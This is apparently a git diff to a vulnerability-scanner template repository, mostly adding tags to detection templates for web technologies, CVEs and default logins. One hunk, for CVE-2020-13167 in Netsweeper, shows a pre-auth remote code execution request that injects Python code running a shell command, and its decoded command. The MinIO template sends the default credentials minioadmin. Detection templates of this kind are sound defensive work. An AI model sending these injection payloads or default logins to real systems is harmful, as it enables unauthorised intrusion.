diff --git a/cves/2020/CVE-2020-12800.yaml b/cves/2020/CVE-2020-12800.yaml
index 4a4a96bb69..8216d0e966 100644
--- a/cves/2020/CVE-2020-12800.yaml
+++ b/cves/2020/CVE-2020-12800.yaml
@@ -6,6 +6,7 @@ info:
severity: critical
description: The drag-and-drop-multiple-file-upload-contact-form-7 plugin before 1.3.3.3 for WordPress allows Unrestricted File Upload and remote code execution by setting supported_type to php% and uploading a .php% file.
reference: https://github.com/amartinsec/CVE-2020-12800
+ tags: cve,cve2020,wordpress,wp-plugin
requests:
- raw:
diff --git a/cves/2020/CVE-2020-13167.yaml b/cves/2020/CVE-2020-13167.yaml
index ffe6eb67a4..961d153f44 100644
--- a/cves/2020/CVE-2020-13167.yaml
+++ b/cves/2020/CVE-2020-13167.yaml
@@ -9,13 +9,15 @@ info:
reference:
- https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/
- https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says
+ additional-fields:
+ hex-payload: 'echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/out'
requests:
- method: GET
path:
- # Hex payload: echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/out
- "{{BaseURL}}/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5"
- "{{BaseURL}}/webadmin/out"
+
headers:
Referer: "{{BaseURL}}/webadmin/admin/service_manager_data.php"
diff --git a/cves/2021/CVE-2021-3377.yaml b/cves/2021/CVE-2021-3377.yaml
index 77ded129f4..1b44686e3e 100644
--- a/cves/2021/CVE-2021-3377.yaml
+++ b/cves/2021/CVE-2021-3377.yaml
@@ -8,6 +8,7 @@ info:
- https://github.com/drudru/ansi_up/commit/c8c726ed1db979bae4f257b7fa41775155ba2e27
author: geeknik
severity: medium
+ tags: cve,cve2021,xss,npm
requests:
- raw:
diff --git a/default-logins/minio/minio-default-password.yaml b/default-logins/minio/minio-default-password.yaml
index 7d2b90fde6..12c46a6efe 100644
--- a/default-logins/minio/minio-default-password.yaml
+++ b/default-logins/minio/minio-default-password.yaml
@@ -4,23 +4,27 @@ info:
name: Minio Default Password
author: pikpikcu
severity: medium
+ tags: default-login,minio
requests:
- method: POST
path:
- "{{BaseURL}}/minio/webrpc"
+
headers:
Content-Type: application/json
- body: |
- {"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"Web.Login"}
+
+ body: '{"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"Web.Login"}'
- method: POST
path:
- "{{BaseURL}}/minio/webrpc"
+
headers:
Content-Type: application/json
- body: |
- {"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"web.Login"}
+
+ body: '{"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"web.Login"}'
+
matchers-condition: and
matchers:
diff --git a/technologies/prometheus-exposed-panel.yaml b/exposed-panels/prometheus-exposed-panel.yaml
similarity index 65%
rename from technologies/prometheus-exposed-panel.yaml
rename to exposed-panels/prometheus-exposed-panel.yaml
index b107509968..2cda5cc379 100644
--- a/technologies/prometheus-exposed-panel.yaml
+++ b/exposed-panels/prometheus-exposed-panel.yaml
@@ -1,9 +1,11 @@
id: prometheus-exposed-panel
+
info:
name: Prometheus.io exposed panel
author: organiccrap
severity: low
- # usually runs on port http/9090
+ tags: panel,prometheus
+
requests:
- method: GET
path:
@@ -12,4 +14,4 @@ requests:
matchers:
- type: word
words:
- - Prometheus Time Series Collection and Processing Server
+ - 'Prometheus Time Series Collection and Processing Server'
\ No newline at end of file
diff --git a/exposures/configs/yii-debugger.yaml b/exposures/configs/yii-debugger.yaml
index 11232d47b1..e93bfbf58e 100644
--- a/exposures/configs/yii-debugger.yaml
+++ b/exposures/configs/yii-debugger.yaml
@@ -4,7 +4,8 @@ info:
name: View Yii Debugger Information
author: geeknik
reference: https://yii2-framework.readthedocs.io/en/stable/guide/tool-debugger/
- severity: info
+ severity: low
+ tags: yii,debug,exposure
requests:
- method: GET
@@ -16,11 +17,14 @@ requests:
- "{{BaseURL}}/sapi/debug/default/view"
redirects: true
+ max-redirects: 2
+ stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 200
+
- type: word
words:
- "Yii Debugger"
diff --git a/exposures/tokens/generic/shoppable-token.yaml b/exposures/tokens/generic/shoppable-token.yaml
index 0f68803be2..0c3d4080a0 100644
--- a/exposures/tokens/generic/shoppable-token.yaml
+++ b/exposures/tokens/generic/shoppable-token.yaml
@@ -5,6 +5,7 @@ info:
author: philippedelteil
severity: info
reference: https://ask.shoppable.com/knowledge/quick-start-api-guide
+ tags: exposure,shoppable,token
requests:
- method: GET
diff --git a/misconfiguration/front-page-misconfig.yaml b/misconfiguration/front-page-misconfig.yaml
index 7e982772b0..8d49471b46 100644
--- a/misconfiguration/front-page-misconfig.yaml
+++ b/misconfiguration/front-page-misconfig.yaml
@@ -5,6 +5,7 @@ info:
author: JTeles,pikpikcu
severity: info
reference: https://docs.microsoft.com/en-us/archive/blogs/fabdulwahab/security-protecting-sharepoint-server-applications
+ tags: misconfig,exposure,frontpage
requests:
- method: GET
diff --git a/technologies/artica-web-proxy-detect.yaml b/technologies/artica-web-proxy-detect.yaml
index 82b19cfb2d..8fd487f5ee 100644
--- a/technologies/artica-web-proxy-detect.yaml
+++ b/technologies/artica-web-proxy-detect.yaml
@@ -1,18 +1,22 @@
id: artica-web-proxy-detect
+
info:
name: Artica Web Proxy Detect
author: dwisiswant0
severity: info
+ tags: tech,artica,proxy
requests:
- method: GET
path:
- "{{BaseURL}}/fw.login.php"
+
matchers-condition: and
matchers:
- type: word
words:
- "Welcome to the Artica Web Administration Interface"
+
- type: status
status:
- 200
\ No newline at end of file
diff --git a/technologies/basic-auth-detection.yaml b/technologies/basic-auth-detection.yaml
index 66132d212e..894c3892d0 100644
--- a/technologies/basic-auth-detection.yaml
+++ b/technologies/basic-auth-detection.yaml
@@ -4,6 +4,7 @@ info:
name: Basic auth detection
author: w4cky_
severity: info
+ tags: tech,basic-auth
requests:
- method: GET
diff --git a/technologies/bigip-config-utility-detect.yaml b/technologies/bigip-config-utility-detect.yaml
index 4d3c250775..78b2741369 100644
--- a/technologies/bigip-config-utility-detect.yaml
+++ b/technologies/bigip-config-utility-detect.yaml
@@ -4,6 +4,7 @@ info:
name: BIG-IP Configuration Utility detected
author: dwisiswant0
severity: info
+ tags: tech,bigip
requests:
- method: GET
diff --git a/technologies/burp-api-detect.yaml b/technologies/burp-api-detect.yaml
index 68a7000ee7..10cc8bcac8 100644
--- a/technologies/burp-api-detect.yaml
+++ b/technologies/burp-api-detect.yaml
@@ -5,6 +5,7 @@ info:
author: joanbono
severity: info
reference: https://portswigger.net/burp/documentation/enterprise/api-reference
+ tags: burp,tech
requests:
- method: GET
diff --git a/technologies/cacti-detect.yaml b/technologies/cacti-detect.yaml
index 0a2a721928..9d1d018f12 100644
--- a/technologies/cacti-detect.yaml
+++ b/technologies/cacti-detect.yaml
@@ -4,6 +4,7 @@ info:
author: geeknik
description: Cacti is a complete network graphing solution -- https://www.cacti.net/
severity: info
+ tags: tech,cacti
requests:
- method: GET
diff --git a/technologies/clockwork-php-page.yaml b/technologies/clockwork-php-page.yaml
index 89ef10ba1b..a8537a2f36 100644
--- a/technologies/clockwork-php-page.yaml
+++ b/technologies/clockwork-php-page.yaml
@@ -1,9 +1,11 @@
id: clockwork-php-page
+
info:
name: Clockwork PHP page exposure
author: organiccrap
severity: high
reference: https://twitter.com/damian_89_/status/1250721398747791360
+ tags: tech,clockwork
requests:
- method: GET
diff --git a/technologies/cockpit-detect.yaml b/technologies/cockpit-detect.yaml
index 30bf745acc..81dd323dc8 100644
--- a/technologies/cockpit-detect.yaml
+++ b/technologies/cockpit-detect.yaml
@@ -4,6 +4,7 @@ info:
name: Detect Agentejo Cockpit
author: dwisiswant0
severity: info
+ tags: tech,cockpit
requests:
- method: GET
diff --git a/technologies/dell/dell-idrac6-detect.yaml b/technologies/dell/dell-idrac6-detect.yaml
index 9d8bb598ff..6f3c118b88 100644
--- a/technologies/dell/dell-idrac6-detect.yaml
+++ b/technologies/dell/dell-idrac6-detect.yaml
@@ -1,9 +1,11 @@
id: dell-idrac6-detect
+
info:
name: Detect Dell iDRAC6
author: kophjager007
description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers.
severity: info
+ tags: tech,dell
requests:
- method: GET
diff --git a/technologies/dell/dell-idrac7-detect.yaml b/technologies/dell/dell-idrac7-detect.yaml
index bddc00552b..220cfc4503 100644
--- a/technologies/dell/dell-idrac7-detect.yaml
+++ b/technologies/dell/dell-idrac7-detect.yaml
@@ -1,9 +1,11 @@
id: dell-idrac7-detect
+
info:
name: Detect Dell iDRAC7
author: kophjager007
description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers.
severity: info
+ tags: tech,dell
requests:
- method: GET
diff --git a/technologies/dell/dell-idrac8-detect.yaml b/technologies/dell/dell-idrac8-detect.yaml
index e25dc371e6..2fd72b97aa 100644
--- a/technologies/dell/dell-idrac8-detect.yaml
+++ b/technologies/dell/dell-idrac8-detect.yaml
@@ -1,9 +1,11 @@
id: dell-idrac8-detect
+
info:
name: Detect Dell iDRAC8
author: kophjager007
description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers.
severity: info
+ tags: tech,dell
requests:
- method: GET
diff --git a/technologies/dell/dell-idrac9-detect.yaml b/technologies/dell/dell-idrac9-detect.yaml
index 7677292de5..f339b04905 100644
--- a/technologies/dell/dell-idrac9-detect.yaml
+++ b/technologies/dell/dell-idrac9-detect.yaml
@@ -1,9 +1,11 @@
id: dell-idrac9-detect
+
info:
name: Detect Dell iDRAC9
author: kophjager007
description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers.
severity: info
+ tags: tech,dell
requests:
- method: GET
diff --git a/technologies/favicon-detection.yaml b/technologies/favicon-detection.yaml
index 7394c9fff3..3cf1e620d8 100644
--- a/technologies/favicon-detection.yaml
+++ b/technologies/favicon-detection.yaml
@@ -10,6 +10,7 @@ info:
- https://medium.com/@Asm0d3us/weaponizing-favicon-ico-for-bugbounties-osint-and-what-not-ace3c214e139
- https://github.com/devanshbatham/FavFreak
- https://github.com/sansatart/scrapts/blob/master/shodan-favicon-hashes.csv
+ tags: tech,favicon
requests:
- method: GET
diff --git a/technologies/firebase-detect.yaml b/technologies/firebase-detect.yaml
index fe3ff98b30..5c22ef8819 100644
--- a/technologies/firebase-detect.yaml
+++ b/technologies/firebase-detect.yaml
@@ -5,11 +5,13 @@ info:
author: organiccrap
severity: low
reference: http://ghostlulz.com/google-exposed-firebase-database/
+ tags: tech,firebase
requests:
- method: GET
path:
- "{{BaseURL}}/.settings/rules.json?auth=FIREBASE_SECRET"
+
matchers:
- type: word
words:
diff --git a/technologies/google-storage.yaml b/technologies/google-storage.yaml
index 27f4814a5b..95963c6a8c 100644
--- a/technologies/google-storage.yaml
+++ b/technologies/google-storage.yaml
@@ -4,6 +4,7 @@ info:
name: Google Bucket detection
author: 0xTeles
severity: info
+ tags: tech,gstorage,google,bucket
requests:
- method: GET
diff --git a/technologies/graphql-detect.yaml b/technologies/graphql-detect.yaml
index ef649b7d06..53d67b1326 100644
--- a/technologies/graphql-detect.yaml
+++ b/technologies/graphql-detect.yaml
@@ -4,6 +4,7 @@ info:
name: GraphQL API Detection
author: NkxxkN,ELSFA7110
severity: info
+ tags: tech,graphql
requests:
- method: POST
diff --git a/technologies/graylog-api-browser.yaml b/technologies/graylog-api-browser.yaml
index 6c93a114fa..98799a87c0 100644
--- a/technologies/graylog-api-browser.yaml
+++ b/technologies/graylog-api-browser.yaml
@@ -4,6 +4,7 @@ info:
name: Detect Graylog REST API
author: PR3R00T
severity: info
+ tags: tech,graylog
requests:
- method: GET
diff --git a/technologies/gunicorn-detect.yaml b/technologies/gunicorn-detect.yaml
index 69f286e77b..56f5080384 100644
--- a/technologies/gunicorn-detect.yaml
+++ b/technologies/gunicorn-detect.yaml
@@ -1,9 +1,11 @@
id: gunicorn-detect
+
info:
name: Detect Gunicorn Server
author: joanbono
description: Gunicorn Python WSGI HTTP Server for UNIX - https://github.com/benoitc/gunicorn
severity: info
+ tags: tech,gunicorn
requests:
- method: GET
@@ -22,4 +24,4 @@ requests:
- type: kval
part: header
kval:
- - Server
+ - Server
\ No newline at end of file
diff --git a/technologies/harbor-detect.yaml b/technologies/harbor-detect.yaml
index e082b48acf..1ede65a8df 100644
--- a/technologies/harbor-detect.yaml
+++ b/technologies/harbor-detect.yaml
@@ -1,8 +1,10 @@
id: harbor-detect
+
info:
name: Harbor Detect
author: pikpikcu
severity: info
+ tags: tech,harbor
requests:
- method: GET
diff --git a/technologies/home-assistant.yaml b/technologies/home-assistant.yaml
index 0522fc067b..dfb82e44b7 100644
--- a/technologies/home-assistant.yaml
+++ b/technologies/home-assistant.yaml
@@ -4,6 +4,7 @@ info:
name: Detect Home Assistant
author: fabaff
severity: info
+ tags: tech,iot
requests:
- method: GET
diff --git a/technologies/ilo-detect.yaml b/technologies/ilo-detect.yaml
index 70f0fc1e8d..6eeff924eb 100644
--- a/technologies/ilo-detect.yaml
+++ b/technologies/ilo-detect.yaml
@@ -5,6 +5,7 @@ info:
author: milo2012
severity: info
description: Version of HP iLO
+ tags: tech,ilo
requests:
- method: GET
diff --git a/technologies/jaspersoft-detect.yaml b/technologies/jaspersoft-detect.yaml
index 7cafc9a84d..e26ad12b3f 100644
--- a/technologies/jaspersoft-detect.yaml
+++ b/technologies/jaspersoft-detect.yaml
@@ -4,6 +4,7 @@ info:
name: Jaspersoft detected
author: koti2
severity: info
+ tags: tech,jaspersoft
requests:
- method: GET
diff --git a/technologies/jellyfin-detect.yaml b/technologies/jellyfin-detect.yaml
index ae031c20ca..9b31eaed43 100644
--- a/technologies/jellyfin-detect.yaml
+++ b/technologies/jellyfin-detect.yaml
@@ -4,6 +4,7 @@ info:
name: Jellyfin detected
author: dwisiswant0
severity: info
+ tags: tech,jellyfin
requests:
- method: GET
@@ -13,6 +14,8 @@ requests:
- "{{BaseURL}}/index.html"
- "{{BaseURL}}/web/index.html"
- "{{BaseURL}}/web/manifest.json"
+
+ stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
@@ -22,6 +25,7 @@ requests:
- "The Free Software Media System"
condition: or
part: body
+
- type: status
status:
- 200
diff --git a/technologies/jolokia.yaml b/technologies/jolokia.yaml
index f6b28ff6ad..957b898273 100644
--- a/technologies/jolokia.yaml
+++ b/technologies/jolokia.yaml
@@ -4,11 +4,13 @@ info:
name: Jolokia Version Disclosure
author: mavericknerd,dwisiswant0
severity: info
+ tags: tech,jolokia
requests:
- method: GET
path:
- '{{BaseURL}}/jolokia/version'
+
matchers-condition: and
matchers:
- type: word
@@ -17,6 +19,7 @@ requests:
- '"protocol":'
- '"agent":'
condition: and
+
- type: status
status:
- 200
diff --git a/technologies/kibana-detect.yaml b/technologies/kibana-detect.yaml
index c35b4dd301..c64939b6df 100644
--- a/technologies/kibana-detect.yaml
+++ b/technologies/kibana-detect.yaml
@@ -4,6 +4,7 @@ info:
name: Kibana Service Detection
author: petruknisme
severity: info
+ tags: tech,kibana
requests:
- method: GET
diff --git a/technologies/kong-detect.yaml b/technologies/kong-detect.yaml
index 6164d7c1cd..39e4d58bb7 100644
--- a/technologies/kong-detect.yaml
+++ b/technologies/kong-detect.yaml
@@ -4,6 +4,7 @@ info:
author: geeknik
description: The Cloud-Native API Gateway - https://github.com/Kong/kong
severity: info
+ tags: tech,kong
requests:
- method: GET
diff --git a/technologies/liferay-portal-detect.yaml b/technologies/liferay-portal-detect.yaml
index ebf42ab88b..2a8de63c94 100644
--- a/technologies/liferay-portal-detect.yaml
+++ b/technologies/liferay-portal-detect.yaml
@@ -1,9 +1,11 @@
id: liferay-portal-detect
+
info:
name: Liferay Portal Detection
author: organiccrap,dwisiswant0
severity: info
reference: https://github.com/mzer0one/CVE-2020-7961-POC # CVE-2020-7961: Liferay Portal Unauthenticated RCE
+ tags: tech,liferay
requests:
- method: GET
diff --git a/technologies/linkerd-badrule-detect.yaml b/technologies/linkerd-badrule-detect.yaml
index 5e445af239..0e1ef8ff57 100644
--- a/technologies/linkerd-badrule-detect.yaml
+++ b/technologies/linkerd-badrule-detect.yaml
@@ -1,15 +1,11 @@
id: linkerd-badrule-detect
-# Detect the Linkerd service by overriding the delegation table with an invalid
-# rule, the presence of the service is indicated by either:
-# - a "Via: .. linkerd .."
-# - a "l5d-err" and/or a "l5d-success" header
-# - a literal error in the body
-
info:
name: Linkerd detection via bad rule
author: dudez
severity: info
+ tags: tech,linkerd
+ reference: https://linkerd.io
requests:
- method: GET
diff --git a/technologies/lotus-domino-version.yaml b/technologies/lotus-domino-version.yaml
index 3af4529ee9..897d6fad2e 100644
--- a/technologies/lotus-domino-version.yaml
+++ b/technologies/lotus-domino-version.yaml
@@ -1,8 +1,10 @@
id: lotus-domino-version
+
info:
name: Lotus Domino Version Extractor
author: CasperGN
severity: info
+ tags: tech,lotus
requests:
- method: GET
path:
diff --git a/technologies/metabase-detect.yaml b/technologies/metabase-detect.yaml
index 2b8c4cec7d..3a865ab0e7 100644
--- a/technologies/metabase-detect.yaml
+++ b/technologies/metabase-detect.yaml
@@ -1,13 +1,17 @@
id: metabase-version-detect
+
info:
name: Detect Metabase Version
author: revblock
description: If a Metabase instance is deployed on the target URL it will return a login page with the version number in the page source
severity: info
+ tags: tech,metabase
+
requests:
- method: GET
path:
- "{{BaseURL}}/auth/login"
+
matchers-condition: and
matchers:
diff --git a/technologies/mrtg-detect.yaml b/technologies/mrtg-detect.yaml
index 19a062f6fa..96f95f15d6 100644
--- a/technologies/mrtg-detect.yaml
+++ b/technologies/mrtg-detect.yaml
@@ -1,9 +1,11 @@
id: mrtg-detect
+
info:
name: Detect MRTG
author: geeknik
description: The Multi Router Traffic Grapher -- https://oss.oetiker.ch/mrtg/
severity: info
+ tags: tech,mrtg
requests:
- method: GET
diff --git a/technologies/netsweeper-webadmin-detect.yaml b/technologies/netsweeper-webadmin-detect.yaml
index cc107c6ddc..04b545b315 100644
--- a/technologies/netsweeper-webadmin-detect.yaml
+++ b/technologies/netsweeper-webadmin-detect.yaml
@@ -4,6 +4,7 @@ info:
name: Netsweeper WebAdmin detected
author: dwisiswant0
severity: info
+ tags: tech,netsweeper
requests:
- method: GET
diff --git a/technologies/nginx-version.yaml b/technologies/nginx-version.yaml
index 9674f616ed..302d5d3d19 100644
--- a/technologies/nginx-version.yaml
+++ b/technologies/nginx-version.yaml
@@ -1,9 +1,12 @@
id: nginx-version
+
info:
name: nginx version detect
author: philippedelteil
description: Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.
severity: info
+ tags: tech,nginx
+
requests:
- method: GET
path:
diff --git a/technologies/nifi-detech.yaml b/technologies/nifi-detech.yaml
index 8e593cc440..837e4c43fd 100644
--- a/technologies/nifi-detech.yaml
+++ b/technologies/nifi-detech.yaml
@@ -4,6 +4,7 @@ info:
name: Apache NiFi detect
author: dwisiswant0
severity: info
+ tags: tech,apache,nifi
requests:
- method: GET
@@ -15,6 +16,7 @@ requests:
- "{{BaseURL}}/flow/registries"
- "{{BaseURL}}/system-diagnostics"
- "{{BaseURL}}/nifi-api/access/config"
+
matchers-condition: and
matchers:
- type: regex
@@ -22,6 +24,7 @@ requests:
- "supportsLogin"
- "disconnectedNodeAcknowledged"
- "(aggregate|node)Snapshots?"
+
- type: status
status:
- 200
diff --git a/technologies/oidc-detect.yaml b/technologies/oidc-detect.yaml
index d8f65083d7..f87bf320d2 100644
--- a/technologies/oidc-detect.yaml
+++ b/technologies/oidc-detect.yaml
@@ -1,9 +1,11 @@
id: oidc-detect
+
info:
name: Detect OpenID Connect provider
author: jarijaas
severity: info
description: Detects OpenID Connect providers. See https://en.wikipedia.org/wiki/OpenID_Connect
+ tags: tech,oidc
requests:
- method: GET
diff --git a/technologies/openam-detection.yaml b/technologies/openam-detection.yaml
index b3c603dde0..fd1653f20f 100644
--- a/technologies/openam-detection.yaml
+++ b/technologies/openam-detection.yaml
@@ -4,6 +4,7 @@ info:
name: Detect OpenAM and OpenSSO
author: philippedelteil
severity: info
+ tags: tech,openam
requests:
- method: GET
diff --git a/technologies/pi-hole-detect.yaml b/technologies/pi-hole-detect.yaml
index 0f5cbcb052..22d1a56dca 100644
--- a/technologies/pi-hole-detect.yaml
+++ b/technologies/pi-hole-detect.yaml
@@ -1,8 +1,10 @@
id: pi-hole-detect
+
info:
name: pi-hole detector
author: geeknik
severity: info
+ tags: tech,pihole
requests:
- method: GET
@@ -14,6 +16,7 @@ requests:
- type: status
status:
- 200
+
- type: word
words:
- "Pi-hole"
diff --git a/technologies/prtg-detect.yaml b/technologies/prtg-detect.yaml
index c57d90484d..c630eff289 100644
--- a/technologies/prtg-detect.yaml
+++ b/technologies/prtg-detect.yaml
@@ -1,9 +1,11 @@
id: prtg-detect
+
info:
name: Detect PRTG
author: geeknik
description: Monitor all the systems, devices, traffic, and applications in your IT infrastructure -- https://www.paessler.com/prtg
severity: info
+ tags: tech,prtg
requests:
- method: GET
diff --git a/technologies/redmine-cli-detect.yaml b/technologies/redmine-cli-detect.yaml
index 24a02349aa..8cb08b7888 100644
--- a/technologies/redmine-cli-detect.yaml
+++ b/technologies/redmine-cli-detect.yaml
@@ -4,6 +4,7 @@ info:
author: geeknik
description: A small command-line utility to interact with Redmine - https://pypi.org/project/Redmine-CLI/
severity: info
+ tags: tech,redmine
requests:
- method: GET
diff --git a/technologies/s3-detect.yaml b/technologies/s3-detect.yaml
index fe617373af..3ed37bb68e 100644
--- a/technologies/s3-detect.yaml
+++ b/technologies/s3-detect.yaml
@@ -4,6 +4,7 @@ info:
name: Detect Amazon-S3 Bucket
author: melbadry9
severity: info
+ tags: aws,s3,bucket,tech
requests:
- method: GET
diff --git a/technologies/shiro-detect.yaml b/technologies/shiro-detect.yaml
index 321f556a03..8353c48494 100644
--- a/technologies/shiro-detect.yaml
+++ b/technologies/shiro-detect.yaml
@@ -1,16 +1,20 @@
id: shiro-detect
+
info:
name: Detect Shiro Framework
author: AresX
severity: info
+ tags: tech,shiro
+
requests:
- method: GET
path:
- '{{BaseURL}}'
headers:
Cookie: rememberMe=123;
+
matchers:
- type: word
words:
- - rememberMe=deleteMe
+ - 'rememberMe=deleteMe'
part: header
\ No newline at end of file
diff --git a/technologies/springboot-actuator.yaml b/technologies/springboot-actuator.yaml
index 6bc4c9e7a1..ebc7edbe1e 100644
--- a/technologies/springboot-actuator.yaml
+++ b/technologies/springboot-actuator.yaml
@@ -4,13 +4,17 @@ info:
name: Detect Springboot Actuators
author: that_juan_,dwisiswant0,wdahlenb
severity: info
+ tags: tech,springboot,actuator
requests:
- method: GET
path:
+ - "{{BaseURL}}"
- "{{BaseURL}}/actuator"
- "{{BaseURL}}/favicon.ico"
+ - "{{BaseURL}}/actuator/favicon.ico"
+ stop-at-first-match: true
matchers-condition: or
matchers:
- type: word
diff --git a/technologies/sql-server-reporting.yaml b/technologies/sql-server-reporting.yaml
index 5b08ec1032..4b64c61e6f 100644
--- a/technologies/sql-server-reporting.yaml
+++ b/technologies/sql-server-reporting.yaml
@@ -4,6 +4,7 @@ info:
name: Detect Microsoft SQL Server Reporting
author: puzzlepeaches
severity: info
+ tags: tech,micrsoft
requests:
- method: GET
diff --git a/technologies/telerik-fileupload-detect.yaml b/technologies/telerik-fileupload-detect.yaml
index 810cef7a8b..8f150d8b40 100644
--- a/technologies/telerik-fileupload-detect.yaml
+++ b/technologies/telerik-fileupload-detect.yaml
@@ -4,11 +4,13 @@ info:
name: Detect Telerik Web UI fileupload handler
author: organiccrap
severity: info
+ tags: tech,telerik
requests:
- method: GET
path:
- "{{BaseURL}}/Telerik.Web.UI.WebResource.axd?type=rau"
+
matchers:
- type: word
words:
diff --git a/technologies/terraform-detect.yaml b/technologies/terraform-detect.yaml
index 8c4d3307df..4a458c77e2 100644
--- a/technologies/terraform-detect.yaml
+++ b/technologies/terraform-detect.yaml
@@ -1,9 +1,11 @@
id: terraform-detect
+
info:
name: Detect Terraform Provider
author: geeknik
description: Write Infrastructure as Code - https://www.terraform.io/
severity: info
+ tags: tech,terraform
requests:
- method: GET
diff --git a/technologies/tomcat-detect.yaml b/technologies/tomcat-detect.yaml
index d5a164932d..5561dba63d 100644
--- a/technologies/tomcat-detect.yaml
+++ b/technologies/tomcat-detect.yaml
@@ -1,10 +1,12 @@
-id: tomcat-version-detect
+id: tomcat-version
+
info:
name: Detect Tomcat Version
author: philippedelteil
- description: If an Tomcat instance is deployed on the target URL, when we send a request for
- a non existent resource we receive a Tomcat error page with version.
+ description: If an Tomcat instance is deployed on the target URL, when we send a request for a non existent resource we receive a Tomcat error page with version.
severity: info
+ tags: tech,tomcat,apache
+
requests:
- method: GET
path:
diff --git a/technologies/tor-socks-proxy.yaml b/technologies/tor-socks-proxy.yaml
index ddbe880309..4957f092b8 100644
--- a/technologies/tor-socks-proxy.yaml
+++ b/technologies/tor-socks-proxy.yaml
@@ -1,8 +1,10 @@
id: tor-socks-proxy
+
info:
name: Detect tor SOCKS proxy
author: geeknik
severity: info
+ tags: tech,tor,proxy
requests:
- method: GET
diff --git a/technologies/weblogic-detect.yaml b/technologies/weblogic-detect.yaml
index 6d290ac6f8..4effb62c55 100644
--- a/technologies/weblogic-detect.yaml
+++ b/technologies/weblogic-detect.yaml
@@ -4,6 +4,7 @@ info:
name: Detect Weblogic
author: bing0o
severity: info
+ tags: tech,weblogic
requests:
- method: GET
diff --git a/technologies/werkzeug-debugger-detect.yaml b/technologies/werkzeug-debugger-detect.yaml
index f11eac5435..aa90f4c1a3 100644
--- a/technologies/werkzeug-debugger-detect.yaml
+++ b/technologies/werkzeug-debugger-detect.yaml
@@ -4,6 +4,7 @@ info:
name: Werkzeug debugger console
author: pdteam
severity: info
+ tags: tech,werkzeug
requests:
- method: GET
diff --git a/vulnerabilities/lsoft/listserv_maestro_rce.yaml b/vulnerabilities/lsoft/listserv_maestro_rce.yaml
index 3f04c30a27..56b6d5f00f 100644
--- a/vulnerabilities/lsoft/listserv_maestro_rce.yaml
+++ b/vulnerabilities/lsoft/listserv_maestro_rce.yaml
@@ -8,6 +8,7 @@ info:
reference:
- https://www.securifera.com/advisories/sec-2020-0001/
- https://packetstormsecurity.com/files/159643/listservmaestro-exec.txt
+ tags: rce,listserv,ognl
requests:
- method: GET
diff --git a/vulnerabilities/other/cacti-weathermap-file-write.yaml b/vulnerabilities/other/cacti-weathermap-file-write.yaml
index b8ebf42adb..04a5d1b654 100644
--- a/vulnerabilities/other/cacti-weathermap-file-write.yaml
+++ b/vulnerabilities/other/cacti-weathermap-file-write.yaml
@@ -5,6 +5,7 @@ info:
author: pikpikcu
severity: medium
reference: https://www.freebuf.com/articles/system/125177.html
+ tags: injection,cacti
requests:
- method: GET
diff --git a/vulnerabilities/other/caucho-resin-info-disclosure.yaml b/vulnerabilities/other/caucho-resin-info-disclosure.yaml
index f4fa330ad9..04795427db 100644
--- a/vulnerabilities/other/caucho-resin-info-disclosure.yaml
+++ b/vulnerabilities/other/caucho-resin-info-disclosure.yaml
@@ -5,6 +5,7 @@ info:
author: pikpikcu
severity: info
reference: https://www.exploit-db.com/exploits/27888
+ tags: exposure,resin
requests:
- method: GET
diff --git a/vulnerabilities/other/pmb-local-file-disclosure.yaml b/vulnerabilities/other/pmb-local-file-disclosure.yaml
index 062d1759ab..a62783f871 100644
--- a/vulnerabilities/other/pmb-local-file-disclosure.yaml
+++ b/vulnerabilities/other/pmb-local-file-disclosure.yaml
@@ -5,6 +5,7 @@ info:
author: dhiyaneshDk
severity: high
reference: https://www.exploit-db.com/exploits/49054
+ tags: lfi,pmb
requests:
- method: GET
diff --git a/vulnerabilities/other/vpms-auth-bypass.yaml b/vulnerabilities/other/vpms-auth-bypass.yaml
index d0dcd358f6..6f612b4f78 100644
--- a/vulnerabilities/other/vpms-auth-bypass.yaml
+++ b/vulnerabilities/other/vpms-auth-bypass.yaml
@@ -5,7 +5,7 @@ info:
author: dwisiswant0
severity: high
reference: https://www.exploit-db.com/exploits/48877
-
+ tags: auth-bypass
requests:
- raw:
- |
diff --git a/vulnerabilities/other/zms-auth-bypass.yaml b/vulnerabilities/other/zms-auth-bypass.yaml
index fbc1e03821..65c7df9984 100644
--- a/vulnerabilities/other/zms-auth-bypass.yaml
+++ b/vulnerabilities/other/zms-auth-bypass.yaml
@@ -5,6 +5,7 @@ info:
author: dwisiswant0
severity: high
reference: https://www.exploit-db.com/exploits/48880
+ tags: auth-bypass,zms
requests:
- raw: